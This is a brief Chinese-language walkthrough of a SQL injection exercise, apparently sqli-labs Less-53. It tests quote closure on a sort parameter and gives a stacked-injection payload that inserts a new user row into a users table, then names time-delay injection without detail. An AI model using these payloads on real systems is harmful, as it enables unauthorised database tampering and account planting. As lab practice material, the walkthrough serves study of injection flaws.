1.单引号闭合
?sort=1'
没有报错
?sort=1"
2.报错信息不会在前台显示,我们采用 stacked injection 方法 :?sort=1';insert into users(id,username,password) value (21,'less53','less53')--+
3.延迟注入
